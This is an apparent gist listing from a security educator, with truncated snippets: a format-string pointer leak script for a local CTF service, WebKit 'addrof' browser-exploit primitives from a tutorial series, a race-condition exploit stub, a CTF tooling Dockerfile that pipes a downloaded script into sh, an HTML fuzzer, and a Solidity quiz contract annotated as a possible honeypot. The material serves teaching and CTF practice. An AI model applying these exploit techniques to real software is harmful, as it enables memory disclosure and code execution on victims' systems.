LiveOverflow / readflag.c
Created Dec 18, 2019
File Path Race Condition
#define _GNU_SOURCE
#include <stdio.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <linux/fs.h>
// source https://github.com/sroettger/35c3ctf_chals/blob/master/logrotate/exploit/rename.c
int main(int argc, char *argv[]) {
LiveOverflow / asd.py
Last active Apr 23, 2021
C Application Firewall
import struct
import socket
# Open a TCP connection to the challenge service on the loopback interface.
s = socket.socket()
s.connect(('127.0.0.1', 1337))
# Read whatever the service sends first (presumably a banner or prompt; not shown here).
r = s.recv(1024)
# Send three %p conversions as input. Pointer values only come back if the
# service hands client data to a printf-style call as the format argument;
# passing input as data (e.g. printf("%s", buf)) closes this leak.
# NOTE(review): a str is passed to send() and compared against the reply, which
# only works on Python 2; Python 3 sockets require bytes.
s.send("%p,%p,%p\n")
# Keep reading until a comma-separated reply shows up.
# NOTE(review): recv() returns an empty string once the peer closes, so this
# loop never terminates on a dropped connection.
while ',' not in r:
    r = s.recv(1024)
# Parse the second comma-separated field as hex and subtract 9.
# presumably the start address of the service's input buffer; the offset is
# specific to the target binary and cannot be confirmed from this excerpt.
start_buf = int(r.split(',')[1], 16)-9
LiveOverflow / test.js
Last active Jul 11, 2019
Revisiting JavaScriptCore Internals: boxed vs. unboxed - browser 0x06
// based on: https://github.com/LinusHenze/WebKit-RegEx-Exploit
// tutorial: https://liveoverflow.com/tag/browser-exploitation/
// playlist: https://www.youtube.com/watch?v=5tEdSoZ3mmE&list=PLhixgUqwRTjwufDsT1ntgOY9yjZgg5H_t
// addrof primitive
function addrof(val) {
var array = [13.37];
var reg = /abc/y;
// Target function
LiveOverflow / test.js
Created Jun 22, 2019
Browser Exploitation - browser 0x05
// based on: https://github.com/LinusHenze/WebKit-RegEx-Exploit
// tutorial: https://liveoverflow.com/tag/browser-exploitation/
// playlist: https://www.youtube.com/watch?v=5tEdSoZ3mmE&list=PLhixgUqwRTjwufDsT1ntgOY9yjZgg5H_t
// addrof primitive
function addrof(val) {
var array = [13.37];
var reg = /abc/y;
// Target function
LiveOverflow / test.js
Last active Jun 22, 2019
Browser Exploitation - browser 0x04
// based on: https://github.com/LinusHenze/WebKit-RegEx-Exploit
// tutorial: https://liveoverflow.com/tag/browser-exploitation/
// playlist: https://www.youtube.com/watch?v=5tEdSoZ3mmE&list=PLhixgUqwRTjwufDsT1ntgOY9yjZgg5H_t
// addrof primitive
function addrof(val) {
var array = [13.37];
var reg = /abc/y;
// Target function
LiveOverflow / Dockerfile
Created May 18, 2019
ubuntu:18.04 CTF Docker
# Base image for a CTF tooling container.
# NOTE(review): ubuntu:18.04 is a mutable tag and the release is past its
# standard support window; pin the image by digest, or move to a supported
# release, if this is rebuilt or used for more than a throwaway lab box.
FROM ubuntu:18.04
# Set the LC_CTYPE environment variable to C.UTF-8 for every later layer and
# for processes in the running container.
ENV LC_CTYPE C.UTF-8
# NOTE(review): the RUN step that follows pipes a script fetched from a branch
# head straight into sh, clones tool repositories without pinning a commit and
# installs pip packages without versions. Nothing is checked against a hash, so
# each rebuild trusts whatever those remotes serve at that moment. Pin commits
# and versions and verify checksums where build integrity matters.
RUN apt-get update && apt-get install -y strace ltrace curl wget gcc net-tools vim gdb python python3 python3-pip wget git make procps libpcre3-dev libdb-dev libxt-dev libxaw7-dev python-pip && (wget -q -O- https://github.com/hugsy/gef/raw/master/scripts/gef.sh | sh) && pip install capstone && mkdir tools && cd tools && git clone https://github.com/JonathanSalwan/ROPgadget && pip3 install keystone-engine && pip3 install unicorn && pip3 install capstone && pip3 install ropper && pip3 install keystone-engine && pip install requests && pip install pwn && git clone https://github.com/radare/radare2 && cd radare2 && sys/install.sh && pip install r2pipe && dpkg --add-architecture i386 && apt update && apt install -y libc6:i386 libncurses5:i386 libstdc++6:i386 && wget https://developer.arm.com/-/media/Files/downloads/gnu-rm/7-2018q2/gcc-arm-none-eabi-7-2018-q2-update-linux.tar.bz2?revision=bc2c96c0-14b5-4bb4-9f18-bceb4050fee7?product=GNU%20Arm%20Embedded%20Toolchain,64-bit,,Lin
LiveOverflow / fuzz.html
Created Apr 7, 2019
Fuzz innerHTML vs. DOMParser
<html>
<body>
<script>
const tags = ["a", "abbr", "address", "area", "article", "aside", "audio", "b", "base", "bdi", "bdo", "blockquote", "body", "br", "button", "canvas", "caption", "cite", "code", "col", "colgroup", "data", "datalist", "dd", "del", "details", "dfn", "dialog", "div", "dl", "dt", "em", "embed", "fieldset", "figcaption", "figure", "footer", "form", "h1", "h2", "h3", "h4", "h5", "h6", "head", "header", "hgroup", "hr", "html", "i", "iframe", "img", "input", "ins", "kbd", "keygen", "label", "legend", "li", "link", "main", "map", "mark", "math", "menu", "menuitem", "meta", "meter", "nav", "noscript", "object", "ol", "optgroup", "option", "output", "p", "param", "picture", "pre", "progress", "q", "rb", "rp", "rt", "rtc", "ruby", "s", "samp", "script", "section", "select", "slot", "small", "source", "span", "strong", "style", "sub", "summary", "sup", "svg", "table", "tbody", "td", "template", "textarea", "tfoot", "th", "thead", "time", "title", "tr", "track", "u", "ul", "var", "video", "wbr"]
View AcoraidaMonicaGame.sol
pragma solidity =0.4.25;
contract AcoraidaMonicaGame{
// Revision number of this contract, readable through the generated getter.
uint256 public version = 4;
// Public pitch text advertising a 10000 ETH reward.
// NOTE(review): nothing in the visible lines funds or enforces this promise;
// a large advertised prize combined with an opaque external contract (see
// `logger`) is a pattern seen in quiz-style honeypots, so verify the full
// source and the deployed bytecode before sending funds.
string public description = "Acoraida Monica admires smart guys, she'd like to pay 10000ETH to the one who could answer her question. Would it be you?";
// Example question/answer pair published as compile-time constants.
string public constant sampleQuestion = "Who is Acoraida Monica?";
string public constant sampleAnswer = "$*!&#^[` a@.3;Ta&*T` R`<`~5Z`^5V You beat me! :D";
// Handle to an external Logger contract at a hard-coded address.
// NOTE(review): the Logger source is not shown here; any call into it runs
// code that has to be audited separately before this contract can be trusted.
Logger public constant logger=Logger(0x5e351bd4247f0526359fb22078ba725a192872f3);
// presumably the account that posted the current question (confirm against
// the functions that write it). No visibility keyword, so it is internal and
// has no getter; the storage slot is still readable by anyone off-chain.
address questioner;
// Current question text, publicly readable.
string public question;
LiveOverflow / docker-compose.yml
Last active Nov 8, 2020
flaglab - Real World CTF 2018
web:
image: 'gitlab/gitlab-ce:11.4.7-ce.0'
restart: always
hostname: 'gitlab.example.com'
environment:
GITLAB_OMNIBUS_CONFIG: |
external_url 'http://gitlab.example.com'
redis['bind']='127.0.0.1'
redis['port']=6379
gitlab_rails['initial_root_password']=File.read('/steg0_initial_root_password')